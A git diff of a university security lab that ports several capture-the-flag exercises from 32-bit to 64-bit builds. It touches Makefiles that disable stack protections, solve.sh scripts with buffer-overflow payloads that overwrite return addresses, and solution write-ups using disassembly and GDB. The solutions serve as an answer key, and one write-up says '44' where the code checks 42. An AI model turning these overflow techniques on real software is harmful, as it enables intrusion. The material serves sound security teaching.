lab12 32bits -> 64bits

labs/lab-12/tasks/feeling-chained/solution/Makefile

@@ -1,17 +1,17 @@
 CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
 SRC_DIR = .
 TARGET = buff-ovf3
 OBJ = buff-ovf3.o
 
 all: $(TARGET)
 
 obfuscator: $(SRC_DIR)/obfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 deobfuscator: $(SRC_DIR)/deobfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 $(TARGET): $(OBJ)
 	$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)

labs/lab-12/tasks/feeling-chained/solution/solve.sh

@@ -1,7 +1,10 @@
 #!/bin/bash
 # SPDX-License-Identifier: BSD-3-Clause
 
-python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x56\x93\x04\x08"
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*18 + b"\x96\x11\x40\x00"
                                                         + b"\x00\x93\x04\x08"
                                                         + b"\x38\x00\x00\x00"
                                                         + b"\x0d\x00\x00\x00")' | ../support/buff-ovf3
+
+
+run < <(python3 -c 'import sys; sys.stdout.buffer.write(b"\x00"*18 + b"\x3c\x13\x40\x00\x00\x00\x00\x00" + b"\x00"*2000)')

labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile

@@ -1,16 +1,16 @@
 CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
 SRC_DIR = .
 TARGET = main
 
 all: $(TARGET)
 
 obfuscator: $(SRC_DIR)/obfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 deobfuscator: $(SRC_DIR)/deobfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 link: $(SRC_DIR)/link.c
 	$(CC) $(CFLAGS) -c -o $@ $<

labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md

@@ -10,7 +10,17 @@ This is a clear indicator that we have to find a way to call it ourselves.
 
 We define a `get_flag()` function prototype as void (you may be able to skip this step, but there will be an implicit declaration error during compilation) and we call it in our main function.
 We then compile and assemble the file:
-`gcc -g -m32 -fno-PIC -c main.c`
+`gcc -g -m64 -fno-PIC -c main.c`
+
+This command compiles `main.c` into an object file `main.o` without position-independent code (PIC): -fno-PIC.
+The `-g` flag is used to include debugging information, and `-m64` specifies that we are compiling for a 64-bit architecture.
+The `-c` flag tells the compiler to compile the source file into an object file without linking it.
 
 We then link it to the `link` binary:
-`gcc -no-pie -m32 link main.o -o a.out`
+`gcc -no-pie -m64 link main.o -o a.out`
+
+This command links the `link` binary with our object file `main.o` to create an executable named `a.out`.
+The `-no-pie` flag is used to disable position-independent executables, and `-m64` specifies that we are linking for a 64-bit architecture.
+
+Finally, we run the executable:
+`./a.out`

labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile

@@ -1,16 +1,16 @@
 CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
 SRC_DIR = .
 TARGET = main
 
 all: $(TARGET)
 
 obfuscator: $(SRC_DIR)/obfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 deobfuscator: $(SRC_DIR)/deobfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 link2: $(SRC_DIR)/link.c
 	$(CC) $(CFLAGS) -c -o $@ $<

labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md

@@ -10,26 +10,17 @@ In a nature similar to that of the previous exercise, we take a close look at th
 ```asm
 0000012b <helper>:
 (...)
-137: 83 7d 08 2a                   cmp     dword ptr [ebp + 8], 42
-13b: 75 0d                         jne     0x14a <helper+0x1f>
-13d: 80 7d f4 58                   cmp     byte ptr [ebp - 12], 88
-141: 75 07                         jne     0x14a <helper+0x1f>
-143: e8 b8 fe ff ff                call    0x0 <get_flag>
+149:   83 7d fc 2a             cmp    DWORD PTR [rbp-0x4],0x2a
+14d:   75 0d                   jne    15c <helper+0x27>
+14f:   80 7d f8 58             cmp    BYTE PTR [rbp-0x8],0x58
+153:   75 07                   jne    15c <helper+0x27>
+155:   e8 a6 fe ff ff          call   0 <get_flag>
 ```
 
-The first `cmp` instruction at `0x137` compares the value at `[ebp + 8]` with `42`.
-This implies that the first argument passed to the helper() function is expected to be `42`.
-The second `cmp` instruction at `0x13d` compares the value at `[ebp - 12]` with `88`.
-Since it's comparing a single byte (`byte ptr`), we can infer that this corresponds to a `char` argument.
-Although it appears to be a local variable, if we look around a bit, we will notice why that is:
-
-```asm
-131: 8b 45 0c                      mov     eax, dword ptr [ebp + 12]
-134: 88 45 f4                      mov     byte ptr [ebp - 12], al
-```
-
-The value at `[ebp + 12]` is moved into the `eax` register - this corresponds to the second argument passed to the `helper` function.
-The lower byte of `eax`, `al`, the `char` that we are interested in, is then moved into a local variable.
+The first 'cmp' instruction at '0x149' compares the value at '[rbp - 0x4]' with '0x2a'.
+This implies that the first argument passed to the helper() function is expected to be '0x2a'.
+The second 'cmp' instruction at '0x14f' compares the value at '[rbp - 0x8]' with '0x58'.
+Since it's comparing a single byte ('byte ptr'), we can infer that this corresponds to a 'char' argument.
 
 If both of the aforementioned comparisons are successful, the `get_flag()` function is called.
 Hence, we can infer that we need to call the `helper()` function using the two arguments above - the integer `44`, and the char `X`, which is `88` in decimal.

labs/lab-12/tasks/indirect-business/README.md

@@ -12,19 +12,3 @@ Use the input to alter the data in your favor.
 If you experience a neural buffer overflow, take a look at the [relevant lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%2011%20-%20Buffer%20Management.%20Buffer%20Overflow/) and at [online examples](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85).
 
 If that still doesn't work, keep in mind that the great cybersecurity expert named Sun Tzu was a big proponent of bruteforce attacks.
-
-## Checker
-
-To test the implementation, enter the `tests/` directory and run:
-
-```console
-make check
-```
-
-In case of a correct solution, you will get an output such as:
-
-```text
-test_payload                     ........................ passed ... 100
-
-Total:                                                           100/100
-```

labs/lab-12/tasks/indirect-business/solution/Makefile

@@ -1,17 +1,17 @@
 CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
 SRC_DIR = .
 TARGET = buff-ovf
 OBJ = buff-ovf.o
 
 all: $(TARGET)
 
 obfuscator: $(SRC_DIR)/obfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 deobfuscator: $(SRC_DIR)/deobfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 $(TARGET): $(OBJ)
 	$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)

labs/lab-12/tasks/indirect-business/solution/README.md

@@ -8,6 +8,16 @@
 Use the buffer overflow to overwrite a string on the stack.
 This is going to be copied to a global variable that is checked before calling the `get_flag()` function.
 
+Check the code from ./buff-ovf with GDB:
+```
+    char local_buff[10];
+    char message[10];
+
+    fgets(message, 20, stdin);
+    strcpy(buff, local_buff);
+```
+By analysing the code we can see that string "message" is 10 bytes long, but we are reading 20 bytes from stdin. By overflowing the buffer we can overwrite the "local_buff" variable with a string. 
+
 ```sh
 python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf
 ```

labs/lab-12/tasks/indirect-business/solution/solve.sh

@@ -1,3 +1,2 @@
 #!/bin/bash
-
 python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf

labs/lab-12/tasks/look-at-him-go/README.md

@@ -10,4 +10,4 @@ The `look-at-him-go/support/dynamic` binary is executable this time and its sole
 No tricks here.
 > **TIP:** GDB is your friend.
 
-If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%202%20-%20Memory%20Operations.%20Introduction%20to%20GDB/Introduction%20to%20GDB/Reading/) and [this](https://stackoverflow.com/questions/5429137/how-to-print-register-values-in-gdb).
+If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/labs/lab-02/reading/introduction-to-GDB.html) and [this](https://stackoverflow.com/questions/13282176/using-gdb-to-check-registers-values/13282633).

labs/lab-12/tasks/look-at-him-go/solution/.gdb_history

@@ -0,0 +1,9 @@
+lay n
+b main
+run
+n
+lay n
+tui disable
+run
+n
+q

labs/lab-12/tasks/look-at-him-go/solution/Makefile

@@ -1,17 +1,17 @@
 CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
 SRC_DIR = .
 TARGET = dynamic
 OBJ = dynamic.o
 
 all: $(TARGET)
 
 obfuscator: $(SRC_DIR)/obfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 deobfuscator: $(SRC_DIR)/deobfuscator.c
-	$(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+	$(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
 
 $(TARGET): $(OBJ)
 	$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)

labs/lab-12/tasks/look-at-him-go/solution/README.md

@@ -8,17 +8,15 @@ parent: 'Task: Hook at Him Go'
 Run the executable with GDB, ideally with `gef`, `pwndbg`, or `peda`.
 As you step through, you will notice that the flag will appear in fragments in the display of the register contents (the flag string contains null characters placed specifically so that it would not be displayed all at once).
 
-```asm
-$eax   : 0x0804d625  →  "_out,"
-$ebx   : 0x0804d22e  →  "_out,"
-$ecx   : 0x0804d62a  →  0x00000000
-$edx   : 0x0804d625  →  "_out,"
-```
+You may also see fragments in the memory dump, at times.
 
-You may also see fragments in the memory dump, at times:
+To step through the code, you can use the following commands:
 
-```asm
-0xffffd4b8│+0x0008: 0xf7fb9000  →  0x001ead6c
-0xffffd4bc│+0x000c: 0x0804d600  →  0x00000000
-0xffffd4c0│+0x0010: 0x0804d210  →  0x00495348 ("HSI"?)
+```gdb
+ni # Step to the next instruction
+n # Step to the next line of code
+b *0x<address> or <line> or <fun_name> # Set a breakpoint at a specific address
+c # Continue execution until the next breakpoint
 ```
+
+Observe the registers and memory as you step through the code, and you will see the flag being constructed in parts.